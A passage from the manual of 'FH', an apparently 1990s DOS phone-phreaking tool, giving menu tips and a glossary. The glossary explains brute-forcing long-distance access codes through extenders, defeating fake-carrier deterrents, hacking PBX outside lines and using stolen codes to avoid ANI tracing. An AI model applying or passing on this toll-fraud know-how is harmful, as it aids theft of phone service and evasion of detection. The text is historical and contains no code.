         ones this program has.  Well, I wouldn't exactly call them 'quirks'
         it is more like little unmentioned things that you can do, and tips.

                You can hit any arrow key to flip around most menus, unless it
                says otherwise.  You can also type the # (or letter) of the
                option, and it will be highlighted.

                Hitting ESC will move you back to the previous menu.

                Keypresses are buffered like hell, so if you think you
                didn't press it hard enough, wait a second or two to
                be sure before you punch that bad boy again. Sometimes you
                will be surprised to find yourself flipping wildly through
                the menus.

                If the Quit to DOS option is enabled on the Scanner or Hacker
                it will only drop to DOS if the program finishes Hacking or
                Scanning by means of the timer or (in the case of the Scanner)
                if the last number is dialed. Aborting the Hacker or Scanner
                with a keypress will disable the Quit to DOS option.

                Hitting the space bar in any of the editmenus will allow
                you to change that option (just as if you hit return).

                The Home, End, PgUp, and PgDn keys serve their familiar
                functions in most places. On the menus they jump from top
                to bottom and bottom to top, and when at the Edit Command Line
                they will jump to the first or last extender,target,valid
                or whatever. Try 'em out.

                If you need to change the .DAT files around, sometimes it
                is quickest just to delete the whole goddamn thing. (For
                example: you fucked around with the Response Codes, and
                forgot what to set them back to...) The program will create
                a new file if it finds one missing, and make the first
                record the default values for whatever the file is. (So if
                you deleted CONFIG.DAT, when you run the program again, it
                will say CREATING CONFIG.DAT, and you will have to go and
                configure for your modem. However the response codes will
                be set to their default values...) Don't be afraid to delete!

              WOW.  I could have sworn there were more little things. Well,
         if I forgot anything, I am sure you will figure em out. This is it,
         so go tear em up, eh?

TERMS

  Some of the terms you will encounter while you use FH may need some
explanation, so here's a small glossary of terms:

  CD

    Short for Carrier Detect. CD is what the Hacker uses to detect valid
    codes, and what the Scanner is scanning for.

  COMMAND LINE

    The DOS prompt where you type FH to run the program. The parameters
    you type after FH are used to set temporary values for the information
    in the Miscellaneous Parameters Menu.

  EXCHANGE

    The first 3 digits of a local phone number are referred to as the
    exchange. The scanner in FH scans 'exchanges.'

  EXTENDER

    A dialup for a LD service. This is the number people call to enter their
    access code in order to make a LD call.

  FAKE CARRIER

    Some extenders issue a fake answer tone to deter code hackers. This can
    often be overcome by hacking the extender at a different baud rate than
    the answer tone is designed for. The baud rate can be set individually
    for each extender, often enabling you to 'beat' fake carriers.

  I/O WINDOWS

    When hacking or scanning, the modem input and output can be displayed
    sequentially on the screen in two windows. The output to the modem is
    displayed in a 20 byte window on the upper left of screen, which scrolls
    from right to left as more output takes place. The input from the modem
    behaves in the same way, but on the upper right of the hacker/scanner
    screen.

  LD

    Long Distance. A number that is out of your local dialing area.

  PBX

   Private Business Exchange. A PBX is a phone system that is for the
   exclusive use of a business or institution. These are the kinds of
   phone systems where you have to dial a 9 (or something) to get an
   'outside line.' These systems apply to FH in two ways. The first is
   hacking from within a PBX system. FH is capable of doing this, by
   dialing the 'outside line' code before it dials the extender, valid code
   or exchange. PBX systems sometimes have a line with which you can call
   into the PBX system, enter a code, and have access to the 'outside line'
   without even being present at the PBX itself. The Code Template can
   be configured to hack PBX systems.

  TARGET

    When FH 'hacks' a code it dials an extender, enters a random code,
    and then dials a target number. The target number must be one that
    answers with a carrier. If FH gets a CONNECT message, the code dialed
    must be valid. (However, see FAKE CARRIER).

  VALID

    This is the term FH uses to refer to a 'good code' stored in the file
    VALIDS.DAT. FH uses these valid dialups/codes to hack long distance
    extenders, or to hack local extenders without the threat of ANI.

                            Documentation Written by
                        The Raving Lunatic and Hypnocosm

                           with Inspirational help by
                          Adrian Belew, and Sweet Leaf

                      Discipline is not an end in itself,
                         but merely means to an end.
                           Or something like that...

                       This has been a 2af presentation.